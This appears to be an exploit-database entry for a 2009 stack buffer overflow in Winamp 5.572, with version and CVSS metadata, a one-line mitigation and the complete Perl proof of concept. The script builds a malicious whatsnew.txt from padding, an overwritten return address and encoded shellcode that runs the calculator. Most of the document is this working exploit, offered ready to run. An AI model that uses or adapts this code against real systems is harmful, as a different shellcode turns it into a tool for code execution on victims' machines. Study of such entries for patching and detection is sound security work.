Winamp v5.572 whatsnew.txt Stack Overflow Exploit

vendor:

Winamp

by:

Dz_attacker

7,5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Winamp

Affected Version From: 5.572

Affected Version To: 5.572

Patch Exists: YES

Related CWE: N/A

CPE: a:nullsoft:winamp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

Winamp v5.572 whatsnew.txt Stack Overflow Exploit

This exploit is for Winamp v5.572. It is a stack overflow exploit which uses a shellcode to execute a calculator. The exploit is written in Perl and creates a whatsnew.txt file with the malicious code. The malicious code consists of 540 A characters, 36 H characters, the shellcode, and 500 A characters.

Mitigation:

The user should update to the latest version of Winamp and ensure that the system is patched with the latest security updates.

Source

Exploit-DB raw data:

# Tested on: Windows xp sp3
# Code :

#!/usr/bin/perl
# Winamp v5.572 whatsnew.txt Stack Overflow Exploit
# Original : http://www.exploit-db.com/exploits/11248
# Exploit by : Dz_attacker (dz_attacker@hotmail.fr)

## win32_exec - EXITFUNC=process CMD=calc
my $shellcode = "UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIp3JiOsYyYNxYZNKiBTety".
"dQKMQ43TSmT8LWbTPK3ZKKLyrL4t8Tdsf20OtHLMI2uOHqWPnr5IlXMKMOkJkKdnypOOTXMjY".
"pY4OzXlYGaPjimIBniGXG8Zr1tNc6m8XgmK5dNyiYtoOJ8uf24L1fILYBo90XML9T6TOKpaIO".
"kYKjpuCIktOn0nyvqpoqURn7DOp4OGSXP9pw7rrwPwqdLsZ7lvolL5NOkL4n0MoMKxlO49iVy".
"4OpLI2fpk48LLYT8NXNsgSjFXdNzokkXWwtLpiqPJLlrxJkBxwMtNjJNtNjb1UJO3SNOQcalM".
"7XLR2tPtJA";
my $overflow = "Winamp 5.572".
"A" x 540 .
"UbSx". # push ebp;ret
"H" x 36 .
$shellcode.
"A" x 500;


open(myfile,'>>whatsnew.txt');

print myfile $overflow;